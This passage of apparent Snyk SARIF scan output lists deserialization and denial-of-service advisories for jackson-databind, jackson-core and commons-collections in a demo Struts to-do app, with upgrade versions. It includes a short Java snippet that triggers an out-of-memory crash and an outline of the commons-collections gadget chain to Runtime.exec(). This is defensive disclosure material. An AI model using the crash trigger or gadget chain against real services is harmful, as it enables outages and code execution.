io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
An attacker could perform an XML External Entity (XXE) Injection via the `JDK` classes due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14720`) is not identical to `CVE-2018-12018`, `CVE-2018-14729`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. 
Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72450", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": 
"(CVE-2018-14719) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack via the `blaze-ds-opt` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14719`) is not identical to `CVE-2018-12018`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n- [GitHub Release Notes](https://github.com/FasterXML/jackson-databind/blob/a066415d66a6b1a4688ff0ed25695aa3a86ac130/release-notes/VERSION-2.x)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72451", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2018-14721) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding 
functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A malicious user could perform a SSRF attack via the `axis2-jaxws` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14721`) is not identical to `CVE-2018-12018`, `CVE-2018-14719`, `CVE-2018-14720`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. 
Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72882", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": 
"(CVE-2018-19362) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `jboss-common-core ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19362`) is not identical to `CVE-2018-19360` and `CVE-2018-19361`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72883", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2018-19360) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected 
versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `axis2-transport-jms ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19360`) is not identical to `CVE-2018-19362` and `CVE-2018-19361`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72884", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2018-19361) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: 
com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `axis2-transport-jms ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19361`) is not identical to `CVE-2018-19362` and `CVE-2018-19360`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. 
The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31519", + "shortDescription": { + "text": "Medium severity - Denial of Service (DoS) vulnerability in com.fasterxml.jackson.core:jackson-core" + }, + "fullDescription": { + "text": "com.fasterxml.jackson.core:jackson-core@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-core@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-core](https://github.com/FasterXML/jackson-core) is a Core Jackson abstractions, basic JSON streaming API implementation\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). 
If the REST endpoint consumes POST requests with JSON or XML data and data are invalid, the first unrecognized token is printed to server.log\r\n> If the first token is word of length 10MB, the whole word is printed. This is potentially dangerous and can be used to attack the server by filling the disk with logs.\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-core` to version 2.8.6 or higher.\n# References\n- [GitHub PR](https://github.com/FasterXML/jackson-core/pull/322)\n- [Jira Issue](https://issues.jboss.org/browse/JBEAP-6316)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-399", + "maven" + ], + "cvssv3_baseScore": 5.3, + "security-severity": "5.3" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31520", + "shortDescription": { + "text": "Medium severity - Denial of Service (DoS) vulnerability in com.fasterxml.jackson.core:jackson-core" + }, + "fullDescription": { + "text": "com.fasterxml.jackson.core:jackson-core@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-core@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-core](https://github.com/FasterXML/jackson-core) is a Core Jackson abstractions, basic JSON streaming API implementation\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). 
When `WRITE_BIGDECIMAL_AS_PLAIN` setting is enabled, Jackson will attempt to write out the whole number, no matter how large the exponent.\r\nThe following sample code will trigger an out of memory exception:\r\n```java\r\nObjectMapper mapper = new ObjectMapper().enable(JsonGenerator.Feature.WRITE_BIGDECIMAL_AS_PLAIN);\r\nmapper.writeValueAsString(new java.math.BigDecimal(\"9.223372E+1010671858\"));\r\n```\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-core` to version 2.7.7 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-core/commit/96642978dcf1b69cba68ec72cb2f652d59a8b5be)\n- [GitHub Issue](https://github.com/FasterXML/jackson-core/issues/315)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-399", + "maven" + ], + "cvssv3_baseScore": 5.3, + "security-severity": "5.3" + } + }, + { + "id": "SNYK-JAVA-COMMONSCOLLECTIONS-472711", + "shortDescription": { + "text": "Medium severity - Deserialization of Untrusted Data vulnerability in commons-collections:commons-collections" + }, + "fullDescription": { + "text": "(CVE-2015-6420) commons-collections:commons-collections@3.1" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: commons-collections:commons-collections\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › commons-collections:commons-collections@3.1\n# Overview\n\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data.\nVersions of commons-collections prior to `3.2.2` do not prevent deserialization of the class `org.apache.commons.collections.functors.InvokerTransformer`. This could be leveraged by an attacker as a gadget within a vulnerable application which deserializes user input to execute arbitrary code. 
\r\n\r\nVersions of commons-collections from 3.2.2 onwards will throw an `UnsupportedOperationException` error when attempts are made to deserialize InvokerTransformer instances to prevent potential remote code execution exploits.\r\n\r\n*Note:* `org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4` we recommend moving to the new artifact if possible.\r\n\r\n# PoC \r\n\r\n```\r\n/*\r\n\tGadget chain:\r\n\t\tObjectInputStream.readObject()\r\n\t\t\tAnnotationInvocationHandler.readObject()\r\n\t\t\t\tMap(Proxy).entrySet()\r\n\t\t\t\t\tAnnotationInvocationHandler.invoke()\r\n\t\t\t\t\t\tLazyMap.get()\r\n\t\t\t\t\t\t\tChainedTransformer.transform()\r\n\t\t\t\t\t\t\t\tConstantTransformer.transform()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tClass.getMethod()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.getRuntime()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.exec()\r\n\tRequires:\r\n\t\tcommons-collections\r\n */\r\n```\n\n# Details\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). 
